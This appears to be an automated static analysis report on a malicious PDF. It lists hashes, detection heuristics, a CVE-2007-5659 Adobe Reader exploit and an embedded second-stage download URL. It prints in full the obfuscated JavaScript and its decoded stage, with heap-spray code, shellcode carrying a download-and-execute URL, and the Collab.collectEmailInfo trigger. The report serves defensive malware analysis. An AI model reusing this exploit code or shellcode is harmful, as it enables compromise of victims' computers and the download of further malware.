Malicious PDF — malware analysis report

Static analysis result for SHA-256 a10d165cad5f798f…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 71df8b2ec589212f515c837d09d6203d SHA-1: 83d3f4c0c9226a00f19fae8b5739bb8608618464 SHA-256: a10d165cad5f798fa9cf212e806b4b5aeaa9e77501c740b65b71ebb7c596a27b
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF document contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_EVAL heuristic firing suggests the JavaScript is obfuscated and likely intended to execute malicious code. The extracted artifact 'javascript_obj0013_001.js' further supports the presence of script content. The exact intent of the script cannot be determined due to obfuscation, but it is likely designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function H3vPXe(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function juvmVVq(iGFA3ctlsRjG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(iGFA3ctlsRjG)"+";"+"}");eval("function ue8BksHETEZR7M(mUAXWYhP){var tX5IGdEJ="+"0,ALhdmX=mUAXWYhP.l"+"en"+"gth,cB9vv2D0VSjw=10"+"2"+"4,UqqZ1,MZ6VJ,q2seYtOj3Ke4Y='',p1XVYdLPCM=tX5IGdEJ,AvtoF8fH=tX5IGdEJ,zptiZv4E=tX5IGdEJ,o3Yba50DQZQ=Ar"+"ra"+"y(63,33,36,31,12,52,23,45,24 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://google-moogle.net/fiesta/load.php?id=30417&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 6559 bytes
SHA-256: 50c6061379d154f78598a64e44af481e5ba0688b2ef8cdb0180af6659a9cea73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function H3vPXe(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function juvmVVq(iGFA3ctlsRjG){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(iGFA3ctlsRjG)"+";"+"}");eval("function ue8BksHETEZR7M(mUAXWYhP){var tX5IGdEJ="+"0,ALhdmX=mUAXWYhP.l"+"en"+"gth,cB9vv2D0VSjw=10"+"2"+"4,UqqZ1,MZ6VJ,q2seYtOj3Ke4Y='',p1XVYdLPCM=tX5IGdEJ,AvtoF8fH=tX5IGdEJ,zptiZv4E=tX5IGdEJ,o3Yba50DQZQ=Ar"+"ra"+"y(63,33,36,31,12,52,23,45,24,8,0,0,0,0,0,0,22,46,42,59,26,39,10,62,57,60,13,1,29,58,38,32,41,43,44,34,40,3,15,4,55,14,7,0,0,0,0,49,0,51,61,0,9,5,17,47,6,2,28,27,21,54,53,35,11,20,19,18,48,25,37,50,56,16,30);f"+"o"+"r(MZ6VJ=M"+"at"+"h.c"+"ei"+"l(ALhdmX/"+"cB9vv2D0VSjw)"+";MZ6VJ>tX5IGdEJ;MZ6VJ-"+"-){fo"+"r(UqqZ1=Ma"+"th.m"+"in(ALhdmX,cB9vv2D0VSjw);UqqZ1>tX5IGdEJ;UqqZ1-"+"-,ALhdmX-"+"-){zptiZv4E|"+"=(o3Yba50DQZQ[mUAXWYhP.cha"+"rCod"+"eAt(p1XVYdLPCM+"+"+)-48])<"+"<AvtoF8fH;if(AvtoF8fH){q2seYtOj3Ke4Y+"+"=juvmVVq"+"(97^zptiZv4E&"+"2"+"5"+"5);zptiZv4E>"+">="+"8;AvtoF8fH-"+"="+"2;}el"+"se{AvtoF8fH="+"6"+";}}"+"}return (q2seYtOj3Ke4Y);}var MjiGXyOD=implode('',['KLKcr','WqF','rJrJT','jecYWW6KbcK@','WW9r4','K','c8','2WsD','e','5KqIOc','lOO','UVW','54wTwW','Utc','Ul','xi','Fp8wY622Wu8w','9Xy1FrjfUBysrKHO','qk','c_JB2y@@fUqX','tO','i9e2','hKufi95','cKK','v','2Wu8w','9Xy1FrjfUBywr','JytUhqf','ip','Jl','6Y9nhy','j','o','Fd2vl5c','nJ4T','csD9','f','h','N','4w','JqTwW6','5OF2W2','sj','e2Wu8','w9','Xy1FrjfUByS@jW2Wu8w9X','y1Fr','j','fUBy','syje2Wu8w9Xy','1F','rjf','UBywrsy','_csq_W9IOK','delrY9nhyjoFd','2vl5c','n','J4TOrr12@','K','JKK','ly','_WVW2','Wu8w','9Xy1Fr','j','fUByS@K_fyZy_','UiqK','iYIyy','AjO','lul','cpQWls9e2hKLKcrW5hrds4RcadTqa','d8eW6KelhfdyqiW','v','cfd','O@KLKcrW','WYy8vKB8','n9@KfhK_lyqIcKs9ccfy','y','sUfWeldll','sfWe','ld','ll','sfW','el','dll','sfWefLidoyWes','deloyWe6Lv98f','Weu','en98fWeue','lqyfWe2','j','S','qsfW','e','24llsf','We24wdOyWe22lqqfWe','EjidSy','We','Ejwd','EyWeuJSl','EyWevj','sl2yWe2jidEyWe6ledEyW','e29','e9E','yWe8Lwll','f','We','lJn','ds','f','We8','Lwl','lf','We6fid@f','We2','jsqs','fWe2jid','o','y','W','e6ledEyWeoOl','qsfWe6Kl@','@fWe2c','e','9yfWefulqs','fW','e2jiq','yf','W','e2jidEyWeOc','wl6fWeoOedoy','We@ul@@fWe6feqyfW','efue','dyf','We2','ji','qEyWe2j','idE','yWe','Oc','wl','6fWeoOed@','fWeScs@@fWey','eelEy','WefunqvyW','e2jsqv','yW','e2jidEyWe','Oc','wl6fWe','oOed','sfWefel','@@fWef','L','wq','yfWef','u','l@EyWe2jSqoyWe2j','idEyWeO','cwl6fWeoO','ndEyWe','rfs@@fW','efKi@6fWe','f','u','el@fWe2jwq','8fWe2j','idEyWeOcwl6fWeOjwdoyWev8n','lEyW','e8KwqSyW','e6','Leq','qfWeE8e9OyWe22lq6fWe2jid2yW','e','ocedE','y','We8Kwl6fWe','6lv9','oyWe24i','9','OyWe','2','ys@qfWe6','ln96fW','eE8','n','9Oy','Wef','un98','fWe2jwllfWe2jidEyWe','uun','9','EyWeEyld8fWe8L','S9f','fWe','@','vlq@fW','e2ji','dEyWe6Led','EyWeE','9','e9OyWe','rKw','ll','fWerL','wlSyW','e','6L','n9EyWeSji9OyWeyel@@','fWe2','jidEyWeojidEyWeOcwll','fWeufnd','oyW','e','oje','dv','yWeocw','llfWefund@fWe2js@2yWe2jidEyWeOcidSyWer','vv9Ey','W','eo9ed','EyW','eSc','e@','yf','Wer','vl@Oy','We2','4i9EyWeuKi','@@','fWe2jidEy','We8KiqffWe6l','v9EyWe29e','9','OyWe2ys@qf','We6ln96','fWeE8n9O','yW','e','Ojsq','@fWe','2jidEyWeu','fedEyW','eo8e','dufWeOc','i','dSy','Wev9S9o','yWeo9Sq','l','fWeye','n9SyWeSj','i@OyWe','o9','w9EyWeO','cwllfWeufnds','f','W','eoj','edOyWeocwll','fWef','und@fWe2jS','9SyW','e2jidEyW','e2js@qfW','e8K','iqf','fWe6lv','9EyWe','28e9','OyWe2qs@','qfWe6ln9','6fWe','E8n9OyWeEjsq@fWe2jidEyW','eu','fedEyWe','6leqffWeE','ji9','OyWe2','ys@qf','We6ln96fW','e','E8n9OyWe2j','sq','@fWe2jid','Ey','WeO','yidEyWeoqw9lfWe','ffidSyWe','ffidSyWeffidSy','Wef','fidSyWefdnlSy','Weoy','edoyWe6ln9SyWeflSqq','fWe','oqiqufWefL','iqff','W','e6ln9OyWe6l','lqsf','We28e@rfWeo','4nll','fWeoOeds','fWe8d','wl','lfWe6lld','sfW','e','E','ce@oyWe29i','@@fWeo','Oe','qSyW','e81nllfW','e','29S9EyWev','9iqSyWeOjnq6','fW','e','lJe92yW','er','didSyW','ev9w98fWe2We','q','8fWeEjilyfWeylsdqfWe28e@oyWerKnq2yWe29idrfWeOjiqvyWeyfs','ql','fWeyKldlfWe8K','w','9yf','WeoylqOyWefln','llf','We','oynllfWe29S','9oyWeu1vqrfWe','29','n','llf','W','e6','l','e9lfWeE9n9qfWesJedSyWe','2','4w','llfWe','29w','llfWeocnqOy','Werl','w9r','f','We2jid@fWeyJsq@fWeyeeq','yf','Weoci','qffWeO9n9vy','WeOWe9','rfWe2ji9yfW','e','@lnlufWe@ev','llf','Wer','LSqOyWe6','unqE','yWe','6L','wlEy','We6dwl@fWe','rlwl','qfW','e6LwlvyWe6','un','lE','yWe6','fn','lSyW','e6fwq2yWe@lnlqfW','e6Ln','qE','yWe6fnl','8fW','e@lvl','sf','WerL','wlyfWe6L','wlS','yW','e6ln','lyfWe','@','enq2yWe@enl','ufWe','61','vq','Ey','W','e','slwllf','We','sevq','sfWes','Kvqlf','WerLvq@fW','e@ev','lsfWeslwlSyWefevqlJWsDe5','ec4fykjOFS21U','a8n','Urufed2sy','jeqquqlqfe','lqfPly6ct','WKf1pycKWRy_','4XTspV9','ly','jeWYy','8vKB','8n9@KfhVnc','KV8yedW5sKJv@','K','L','KcrW2Us7KWXTs','iuueJyLUUFWW6K7_KB9shY4olV4vel2yFK','_','qydf1py','cKWRy_4','X','TspV9','vsfv','1qu12@','KLKcrW2W','u8w9Xy1Fr','jfUBysyjeWeVyOW','icyWW25','yWfK@f1lq','WfK','@f1lqU12@Kdf','hN4w','JqTwW65O','F2','W','W','6','KJo','4B4','_c4','t','yeAO','wi','NR','aeddfhN4','wJ','qTwW65OF25','qyY9nhyjoF','d2vl5cnJ4','T','csDe5ec4fyVjKWV','8slK_lyd7_','qSWU','ptj','iFnji@K','_qy','fvflfel','qfeesY7_KB9shY4','olV4vel','2y','FDe5KY4fydL','KcrWW','e','lKyqtyKFd2aF','j','e','v@','q','qecfKUeT2yYQ5nU6c_UNqv@q','qe','cfKUeT2yYQT2s9e2hKvw','qaqUF6KOUMy','flcW','e4qOsiHRiVK_l','ys21','do','jU','e','B4','_eJTidKPqyxc1lhTSlo8eWuT','ly','jWWZKLceV9ye9x','tUKK_','Jr41Jd1qyDW','5ec4','fy','xqSlF8','eJU8fpu4K','UK_l','ycWfWVL','KiW8K','KrjUKr9','KiYItrlxO4l4KiV8ys9','Plyx','qSl','F8eJU','8','f','pu','4KUK_lyxqSlF8eJ','U8','fpu4','K','UV','J','KKf5cciyysYnrdYuyrUJW','s','De','5','ec4fyqOv','d','29vpOWW6KbcK@WW9r4Kc8','2','W','Yv8vi@','fac@','5sh','rtt','ri2','ccrcsedee','sJ1rd@POl54Oe72_W','4','I2','c','dct','W','Oqfs','y1qrxqSlF8eJU8fpu4KUV','d','yic4K','9l25q9','12@K1tKKvqsqOvd','29vpO','T','rqIWW6jeq','@KL','5f','KvqsqOvd','2','9vpOTU','qIWW6jeWqKL5f','Kf','K@NySqA','cSYr_r','yLe5q9eqZLWW','e8ui','dsHi9Mc','eVKnly','y','1W','sKnf','ZKv','We8u','id','sHi9MWeVK_e6KulyZLqyq','O','vd','29vpOTUqIW','q','6KKes','Kn','fZKvWe8','uidsHi9','MWeVKnl','y@1WsK','PfyA','jOlul','cp','QW','ls9Ply6c','t','WKJK4@2_J','aWW','6Kf_UW91cc','WKKd','JWfqWvcfdcfqWvcfdty9Ply@2','ciJyysrco','euja','4VncK','V','8','y','edWq6Kll','l8fnq9e','5Wt8fhX4ryF_l','yrcoeuj','a4Deqe','dOOWVdO','UJ5','ccU9reY','4KKK','_lySxyUJ','c','tcVd','OU','J5cKi','qKd4cciJO','wUZxysD9Ke','UR','t@KJ5','yJ_','O','Wh','Rlyrc','oeuja4jO2@K','_fyjWWWX','4','_W','m2','W','sDK']);");eval(ue8BksHETEZR7M(MjiGXyOD));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x364 2665 bytes
SHA-256: 2028e97f9303cfba71d058563c55af618b0757a8a4dc2384d7a7732a3d955455
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var H2RTI6ao = new Array(); function RSKrbmmtOIjGZv(sxGBVuKrvlKE, o3zqVKh87U1Vmk) { while (sxGBVuKrvlKE.length*2<o3zqVKh87U1Vmk){sxGBVuKrvlKE += sxGBVuKrvlKE;} sxGBVuKrvlKE = sxGBVuKrvlKE.substring(0,o3zqVKh87U1Vmk/2); return sxGBVuKrvlKE; } function Of78dMJ0() { var z2CPMQFITF9 = 0x0c0c0c0c; var Yq7gK7B7qx = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var zfKCxoR7n2wthH = 0x400000; var uOqqqMuRVKLn3 = Yq7gK7B7qx.length * 2; var o3zqVKh87U1Vmk = zfKCxoR7n2wthH - (uOqqqMuRVKLn3+0x38); var sxGBVuKrvlKE = unescape("%u9090%u9090"); sxGBVuKrvlKE = RSKrbmmtOIjGZv(sxGBVuKrvlKE, o3zqVKh87U1Vmk); var nvqnG4 = (z2CPMQFITF9 - 0x400000)/zfKCxoR7n2wthH; for (var u4a0QuIhXJ=0;u4a0QuIhXJ<nvqnG4;u4a0QuIhXJ++) { H2RTI6ao[u4a0QuIhXJ] = sxGBVuKrvlKE + Yq7gK7B7qx; } } function qVrrW() { var YD7k7UbwLxrm = app.viewerVersion.toString(); YD7k7UbwLxrm = YD7k7UbwLxrm.replace(/\D/g,""); var u9GE3OA = new Array(YD7k7UbwLxrm.charAt(0),YD7k7UbwLxrm.charAt(1),YD7k7UbwLxrm.charAt(2)); if ((u9GE3OA[0] == 8 && ((u9GE3OA[1] == 1 && u9GE3OA[2] < 2) || u9GE3OA[1] < 1)) || (u9GE3OA[0] == 7 && u9GE3OA[1] < 1) || (u9GE3OA[0] < 7)) { Of78dMJ0(); var rQwxVR = unescape("%u0c0c%u0c0c"); while(rQwxVR.length < 44952) rQwxVR += rQwxVR; this.collabStore = Collab.collectEmailInfo({subj: "",msg: rQwxVR}); } } qVrrW();

Open this report in the interactive analyzer, or submit your own file for analysis.